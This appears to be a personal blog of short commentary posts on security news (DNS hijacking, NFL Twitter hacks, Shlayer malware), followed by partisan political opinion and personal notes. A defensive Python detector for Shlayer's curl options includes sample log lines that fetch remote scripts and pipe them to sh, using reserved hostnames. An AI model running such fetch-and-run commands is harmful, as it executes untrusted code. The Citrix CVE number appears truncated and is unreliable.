Adversaries with Turkish Nexus Responsible for Cyber Attacks Targeting Europe and the Middle East

A series of cyber attacks beginning in early 2018 and continuing through 2019 is believed to have been carried out by threat adversaries with a nexus to the Turkish government. Approximately thirty organizations across Europe and the Middle East were affected by the operations, including government ministries and agencies, private industry, and other groups:

According to two British officials and one U.S. official, the activity bears the hallmarks of a state-backed cyber espionage operation conducted to advance Turkish interests.

The officials said that conclusion was based on three elements: the identities and locations of the victims, which included governments of countries that are geopolitically significant to Turkey; similarities to previous attacks that they say used infrastructure registered from Turkey; and information contained in confidential intelligence assessments that they declined to detail.

The officials said it wasn’t clear which specific individuals or organizations were responsible but that they believed the waves of attacks were linked because they all used the same servers or other infrastructure.

What techniques did these purported nation state threat actors leverage?

The hackers used a technique known as DNS hijacking, according to the Western officials and private cybersecurity experts. This involves tampering with the effective address book of the internet, called the Domain Name System (DNS), which enables computers to match website addresses with the correct server.

By reconfiguring parts of this system, hackers were able to redirect visitors to imposter websites, such as a fake email service, and capture passwords and other text entered there.

Essentially, the initial goal of the threat activity was credential harvesting. If you are unfamiliar with the term, it is the act of tricking unsuspecting users into entering their login credentials into a fraudulent web site or application. It usually starts with a phishing email directing users to a web site that appears to be one the victim legitimately uses, asking them to log in, and then storing the credentials for use in a later operation.

Once the attackers had amassed enough credential data, and knowing that average users often reuse the same password across multiple logins, the adversaries could then attempt to breach personal accounts - such as Twitter, Facebook, Gmail, and more - as well as official government or business accounts. The latter are the crown jewels, although the personal accounts may also lead to additional opportunistic, targeted attacks.

What I find most alarming is that certain DNS top-level domain providers were breached. The DNS servers themselves do not appear to have been affected, but a number of the organizations controlling them were compromised. Those organizations should know better, and should have implemented stronger security controls and security awareness.

This demonstrates how anyone can be the victim of a cyber attack.

Hackers Breach Multiple NFL Team Twitter Accounts, Including the 49ers and Chiefs

Pestering hackers are at it again, this time compromising a number of Twitter accounts belonging to National Football League teams, to include the two Super Bowl contenders:

Hackers compromised Twitter accounts belonging to the National Football League and some of its most popular teams, including Super Bowl contenders the San Francisco 49ers and Kansas City Chiefs, in an apparent series of cyberattacks Monday.

The hackers taunted the NFL and the teams in messages saying they were “here to show people that everything is hackable,” and promoted the hackers’ security services via email and Twitter hashtags.

Accounts for the Chicago Bears, Green Bay Packers and Cleveland Browns, among others, were also taken over.

It is not as if hacking Twitter accounts is all that difficult. Let us assume the malicious actors attempted to breach more than just Twitter, such as the teams' corporate networks and other online presence. Why have they thus far only been successful with Twitter?

This is largely due to many users not configuring Twitter for two-factor authentication (TFA) with an authenticator app, such as 1Password, Google Authenticator, or Authy. Had these teams been using TFA, there is a much greater chance this attack would not have succeeded. I specifically called out the use of an authenticator app rather than SMS because the latter is vulnerable.

It will be interesting to see why only these five teams were selected out of the total thirty-two teams in the NFL today. I doubt it has anything to do with specific motivation to attack these teams, but more so because of lax security on those Twitter accounts.

Security Attacks Cost Singapore Businesses $1.25M per Breach

Channel Asia is reporting on a study recently released by McAfee, claiming the average cost of a cyber attack to a Singapore-based business is approximately $1.25m per breach:

According to McAfee findings, the city-state houses the highest estimated costs stemming from a breach across Asia Pacific, ahead of markets such as Australia, Hong Kong, India, Indonesia, Malaysia, New Zealand and Thailand.

Findings from a survey of 480 cyber security decision-makers at a regional level paint a damning picture for Singapore with 80 per cent of respondents claiming that cyber security incidents pose “high” or “medium” impacts on business.

And:

Estimated costs from respondents in Singapore were more than double that of the next highest country in Asia Pacific, identified as Indonesia with financial implications at roughly S$785,000 per breach.

I would like to know how McAfee, and the various companies they interviewed, arrived at these numbers. The cost of internal incident response is something of an art to quantify accurately; the cost of external resources brought in to assist with breach remediation is much easier to account for.

The likelihood of all of these Singapore-based companies only using outside assistance is small. There is a stronger chance of a more hybrid approach, where internal responders work in conjunction with external help of some sort.

In either case, I am curious to see how these numbers were derived.

German City Potsdam Offline After Cyber Attack

Potsdam, the capital of the German state of Brandenburg, has had to disconnect from the internet due to a cyber attack. Although specifics about how the attack was executed are light, the city claims the attack occurred because of a vulnerable third-party provider:

"The background to this is a weak point in the system of an external provider, which attempts to retrieve data from the state capital from outside without authorization or to install malware," an official statement says.

"In order to analyze the damage and to ensure the security of the data, external IT security companies and IT forensic experts are commissioned to support the IT specialists in the administration with their work."

This is far too sparse on details, and almost sounds word-smithed enough to purposely obfuscate any potential blame. A German journalist believes the attackers may have exploited vulnerable public-facing Citrix servers:

While the City of Potsdam's updates on the cyberattack do not go into detail on what was the method the attackers used to infiltrate the network, German journalist Hanno Böck found Citrix ADC servers on the administration's network vulnerable to attacks exploiting the CVE-2019-1978 vulnerability.

Böck says that the servers he found weren't protected using mitigation measures provided by Citrix over a month ago.

If true, this is not at all related to a "weak point in the system of an external provider" but instead a failure of the city IT department to mitigate CVE-2019-1978. Failure to act in cyber space will almost always lead to a compromise.

Never Rely on a Single, Free Security Tool for Analysis

VirusTotal is a valuable resource for checking the verdict on file samples and URLs. Although the service offers a variety of benefits, it should never be the sole trusted resource for conducting analysis, especially in the context of a live incident response operation:

For example, a Defender gets forwarded a phishing email with a link to investigate. The Defender creates the tracking ticket and starts the workflow in their “analysis checklist”. They just want to get through this investigation and close out the ticket. The Defender may not even think about looking at the other things surrounding the email, as in what's the content, where did it come from, what are the email headers, and other indicators. The decision to continue or close the investigation has now become all about the outcome of the scan of over 70 AV scanners on VirusTotal. The results (most likely) return that all 70 plus AV scanners claim the link is clean (not one flag). Defender quickly marks all is clear and closes the ticket. In many cases, this might be a quick solution and is not a bad starting point but can provide many false negatives.

Any cyber security analyst worth their salt knows to cross-reference across multiple tools. VirusTotal is merely one of many useful tools for determining the authenticity of files and URLs, but it is not a one-stop shop to be unequivocally trusted. Any incident response playbook leveraging free applications like VT should include multiple tools, whether on-site or cloud-based, for analysis.

The same can be said for Hybrid Analysis. It is a wonderful tool, most often extremely capable of determining whether or not a sample is malicious. It is not infallible, however, and because it is a free service it should be used in conjunction with other free services. Based on an aggregate score across multiple tools, and the context around the threat, defenders and analysts can take appropriate action.

Construction Company Ransomware Attack Raises Questions About Federal Contracts

A recent ransomware attack against a Canadian construction company is raising questions about the level of cyber security controls required, or apparent lack thereof, for industry to win federal contracts.

While it doesn't appear that any secure government files were compromised in the hack, the Bird case raises concerns about how secure government contracts are as the number of ransomware incidents multiplies.

Between 2006 and 2015, Bird scored 48 contracts with the Department of National Defence totalling more than $406 million. Bird also helped build the RCMP's Surrey detachment headquarters and has done work for Public Services and Procurement Canada.

Christyn Cianfarani, president of the Canadian Association of Defence and Security Industries, said Canada could learn from the United States and Britain, countries that have taken steps to ensure the security systems of all government contractors are locked down — even those not dealing with classified information.

Luckily, no sensitive files were compromised in the attack. However, one has to wonder how a government contractor allowed this to occur. Are there no minimum security requirements for Canadian government contractors? Maybe the bar is set so low that a simple ransomware attack can succeed?

While no company can ensure with 100% certainty that it is safe from attack, there is no reason why a standard ransomware attack should succeed. There is a myriad of endpoint security controls - from next-generation antivirus to endpoint detection and response - capable of either preventing attacks like ransomware or providing visibility into them.

Buried within the article is this note:

"When we look at the major hacks that have occurred, especially on the defence side, where you know fighter aircraft information was stolen — it wasn't stolen from the prime contractor, it was stolen in a tiny, tiny shop supplying widgets," she said, citing the 2017 theft of sensitive information about Australia's defence programs through a government contractor.

Whether they're done by nation states or by criminal organizations or by rogue actors, it's a characteristic of these kinds of attacks to get to governments using businesses as the point of entry, especially ... small businesses that tend to be the most vulnerable."

Threat adversaries are not stupid; they do the reconnaissance required to find vulnerable targets. Those tiny shops supplying widgets are, more often than not, the weakest links in the supply chain.

Mozilla Bans Nearly 200 Malicious Firefox Add-Ons

Notwithstanding a few hiccups here and there, Mozilla takes privacy quite seriously. Over the years they have done a lot of valuable work to ensure the web is a safe place to browse. In their latest move, Mozilla has reviewed the Firefox add-on database and removed nearly two hundred extensions for including malicious code:

Over the past two weeks, Mozilla's add-on review team has banned 197 Firefox add-ons that were caught executing malicious code, stealing user data, or using obfuscation to hide their source code.

The add-ons have been banned and removed from the Mozilla Add-on (AMO) portal to prevent new installs, but they've also been disabled in the browsers of the users who already installed them.

The bulk of the ban was levied on 129 add-ons developed by 2Ring, a provider of B2B software. The ban was enforced because the add-ons were downloading and executing code from a remote server.

Why is this single, relatively unknown company developing that many add-ons? It sure feels like a huge red flag. Surely there is some deception at play.

Laughably Unsophisticated Mac Malware

Major malware infections on macOS are quite rare, but the operating system is by no means immune to what Windows users have had to endure for decades. Over the last two years macOS users have been pestered by Shlayer and all the pirated videos it promises to provide the unsuspecting victim:

An analysis Kaspersky Lab published on Thursday says that Shlayer is “a rather ordinary piece of malware” that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remove traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday’s post said “is basically the calling card of the entire family.”

Another banal detail about Shlayer is its previously mentioned infection method. It’s seeded in links that promise pirated versions of commercial software, episodes of TV shows, or live feeds of sports matches. Once users click, they receive a notice that they should install a Flash update. Never mind that Flash has been effectively deprecated for years and that platforms offering warez and pirated content are a known breeding ground for malware.

Unless you have good self-control, good web browsing hygiene, and common sense, stay away from web sites offering pirated content. Is that one free pirated movie worth all the work to rebuild your computer after it gets infected with malware it should never have had in the first place?
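The Kaspersky analysis quoted above calls the curl option combination -f0L the calling card of the Shlayer family, which makes it a cheap thing to hunt for in process-creation logs. Here is an added example of that detection, not code from the original post or from Kaspersky: it finds curl invocations on a command line (including inside a `bash -c '...'` argument), recognises the three options in any order, bundled, separated or spelled out as long options, and does not trip on the same characters appearing in an option's value; the process log is constructed.

```python
import shlex

# Tokens that end one shell command; a curl invocation runs up to the next one.
SHELL_OPERATORS = {"|", "||", "&&", ";", "&", ">", ">>", "<", "2>", "2>&1"}
# curl short options that take a value, so the value's characters are not flags
# (e.g. "-o /tmp/f0L" must not be read as -f -0 -L).
SHORT_WITH_ARG = set("oHduAeXTbcmwxKEFCDPQrtUYyz")
# Long spellings of the three options that make up the combination.
LONG_ALIASES = {"--fail": "f", "--http1.0": "0", "--location": "L"}
SHLAYER_COMBO = frozenset("f0L")

def _tokens(cmdline):
    """Split a command line; a quoted sub-command (bash -c '...') is split again."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: nothing parseable
        return []
    out = []
    for tok in argv:
        out.extend(_tokens(tok) if any(c.isspace() for c in tok) else [tok])
    return out

def curl_invocations(tokens):
    """Yield the argv of every curl invocation in a token list."""
    i = 0
    while i < len(tokens):
        if tokens[i].rsplit("/", 1)[-1] == "curl":
            j = i + 1
            while j < len(tokens) and tokens[j] not in SHELL_OPERATORS:
                j += 1
            yield tokens[i:j]
            i = j
        else:
            i += 1

def curl_flags(argv):
    """Return which of f, 0, L appear on a curl argv, in any order or bundling."""
    found, k = set(), 1
    while k < len(argv):
        arg = argv[k]
        if arg in LONG_ALIASES:
            found.add(LONG_ALIASES[arg])
        elif arg.startswith("-") and not arg.startswith("--") and len(arg) > 1:
            for pos, ch in enumerate(arg[1:], start=1):
                if ch in SHORT_WITH_ARG:
                    if pos == len(arg) - 1:   # value is the next token: skip it
                        k += 1
                    break                     # rest of this bundle is the value
                if ch in SHLAYER_COMBO:
                    found.add(ch)
        k += 1
    return found

def matches_shlayer_curl(cmdline):
    """True if any curl invocation on the command line carries all of -f, -0 and -L."""
    return any(SHLAYER_COMBO <= curl_flags(inv)
               for inv in curl_invocations(_tokens(cmdline)))

# Constructed process-creation log: (pid, command line). Hosts are reserved names.
SAMPLE_LOG = [
    (4101, "/usr/bin/curl -f0L https://example.invalid/u -o /tmp/.u"),
    (4102, "curl -sSL https://example.invalid/install.sh"),
    (4103, "bash -c 'curl -f -0 -L https://example.invalid/p | sh'"),
    (4104, "curl --fail --http1.0 --location https://example.invalid/x"),
    (4105, "curl -o /tmp/f0L https://example.invalid/benign"),
    (4106, "/bin/ls -la /Library/LaunchAgents"),
]

def flag_suspicious(log=SAMPLE_LOG):
    """PIDs whose command line matches the curl -f0L calling card."""
    return [pid for pid, cmd in log if matches_shlayer_curl(cmd)]
```

On the sample log only PIDs 4101, 4103 and 4104 are flagged; 4105 is not, because `f0L` there is the value of `-o`, not a set of options.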

Exaggerating Impact of Cyber Attacks Does Nobody any Good

Adam Rowe of tech.co has written one of the worst clickbait headlines I have seen recently, stating that cyber incidents are deemed a bigger global business risk than climate change. Fortunately the article itself makes a much different claim:

Cybersecurity risks are the highest priority for businesses around the globe in 2020, according to an extensive new survey. By comparison, climate change clocked in at seventh as the biggest perceived business risk worldwide.

Granted, that's still climate change's highest ever ranking, and a sign that it's moving up in importance as the effects of humanity's impact on Earth's climate become increasingly extreme.

The Allianz Risk Barometer 2020 conducted its research through a survey of over 2,700 experts across 100 countries. These experts were assessing the impact to their specific businesses, as opposed to the overall global risk the clickbait headline suggests.

Overall it is not a bad article, but headline hyperbole is strong with this one.

Japan Fearing Wuhan Coronavirus Outbreak with Olympics on the Horizon

The Tokyo 2020 Olympics are right around the corner and the Wuhan Coronavirus has the entire nation concerned. There are expected to be millions of visitors across Japan to support the Olympics, and Japan is worried a coronavirus outbreak may have a devastating impact on the nation:

Although Japan has seen just one case, the outbreak highlights the risk of contagion given the millions of visitors expected for the Summer Games.

“We have to be very careful about what kind of infectious diseases will appear at the Tokyo Olympics,” Kazuhiro Tateda, president of the Japanese Association for Infectious Diseases, told a briefing on Wednesday.

“At these kinds of mass gatherings, the risks increase that infectious diseases and resistant bacteria can be carried in.”

As a Tokyo resident, and someone who frequently travels abroad, I find this virus extremely concerning. On the one hand, I do not want to unknowingly catch something while abroad on business. On the other, I do not want the influx of tourists to have any major, lasting health effects on Japan.

Hitting the Gym in January is Total Hell on the Legs

I recently got back into the gym and it has been a struggle. The first week was not fun, with every muscle in my body aching after each workout. As Wired points out, which I absolutely can confirm, hitting the gym in January is literal hell on the legs:

But actually that soreness might be the sign of a workout well done. What you’re likely experiencing when your muscles ache the day after a tough gym session is something called DOMS: delayed onset muscle soreness.

When you put your muscles to work, tiny tears appear in the muscle fibres, and it's repairing these tears that leads to inflammation and soreness. DOMS happens after your muscles lengthen under tension, something called eccentric muscle contraction. For example when you’re lowering down a weight and your arm extends slowly, and the muscle tears slightly. It’s also common after downhill running, rock climbing and resistance based exercises.

“We call it the good pain because it shows that your training session was actually quite effective,” says Aamer Sandoo, lecturer in sport and exercise science at Bangor University in Wales. When the muscle repairs those tears, it makes it stronger. With exercise, we're trying to cause trauma to the muscle and the body's response is to make a stronger muscle by depositing more fibres within it.

The good kind of pain. I sure hope whatever I am currently attempting to do in the gym will have a positive effect. To stay motivated I need to see some fairly rapid indication the hard work I am investing in the gym is actually paying dividends towards my ultimate goal of de-beer-belly-ifying!

"Why Are They Doing This to Me??" Trump Asks Friends

President Donald J Trump, the third president to be officially impeached, seemingly cannot wrap his head around any of this:

Meanwhile, with his lawyers going about their business defending the president, Trump, who was at Mar-a-Lago on Friday, appeared “distracted” by the impeachment process. According to CNN, the president was asking people at the resort, “Why are they doing this to me?” adding, that he “can’t understand why” he is impeached.

Someone who cannot figure out why they are being impeached, after having had his administration undertake sketchy operation after sketchy operation, while completely blocking the administration from speaking to Congress to substantiate his "perfect call" with the Ukraine, is obviously unqualified to be in a position of such import. Simply put, President Trump should not be the leader of the free world.

The best leaders are capable of self-reflection and understanding where their decisions went awry. They make adjustments moving forward. Some work, some do not. However, the fact that Trump cannot understand he did anything wrong speaks to his entire life of entitlement, never having learned lessons or been punished for wrongdoing. So this whole concept of pivoting based on lessons learned is as completely foreign to him as is running a successful business.

Senate Republicans are Bathed in Shame

The impeachment of President Donald Trump is officially underway, with the Senate having affirmed their oath to administer impartial justice. However, as most of the global witnesses have observed, over half of the current US Senate has basically buried their heads in the sand, essentially rendering a shameless verdict before the trial begins.

How in God’s name — and it was in God’s name — can the Republicans who have already decided to acquit President Trump take a solemn oath to administer “impartial justice”? They’re partial to the core, unabashedly so, as their united march toward a foregone conclusion shows. A mind-meld this ironclad isn’t a reflection of facts. It’s a triumph of factionalism.

The majority of the party’s senators have said outright or clearly signaled that they have no intention of finding the president guilty and removing him from office. Yapping lap dogs like Lindsey Graham and obedient manservants like Mitch McConnell have gone further, mocking the whole impeachment process.

So the oath they took: How does that work? Did they cross the fingers on their left hands? Do they reason that American politics has reached a nadir of such fundamental hypocrisy and overweening partisanship that no one regards that pledge as anything but window dressing?

If the tables were reversed you can rest assured the Republicans would be crying day and night on state-sponsored TV, and be doing everything in their power to ensure the Democratic president was removed from office.

Suicides in Japan Fall Below 20,000 to Record Low in 2019

Although Japan is stereotypically known as the suicide country, the latest statistics are painting a different picture. The number of officially recorded suicides in Japan has decreased to below 20,000 for the first time since 1978:

There is still a possibility that final tallies, which will be published in March, will show a slight increase to above 20,000, the ministry said. But even so, it’s possible that the 2019 figure will represent an all-time low, breaking the mark set in 1981 of 20,434, according to ministry official Yoshindo Nonaka.

The ministry’s figures show that 2019 marked a 10th consecutive year-on-year decrease in the number of suicides, down 881 people — or 4.2 percent — from a year earlier.

The number of suicides recorded in Japan stood at 19,959 last year, falling below the 20,000 mark for the first time since authorities began keeping such records in 1978, according to preliminary figures released Friday by the health ministry.

Although the exact reason is not yet known, I think everyone can agree the downward trend is extremely positive.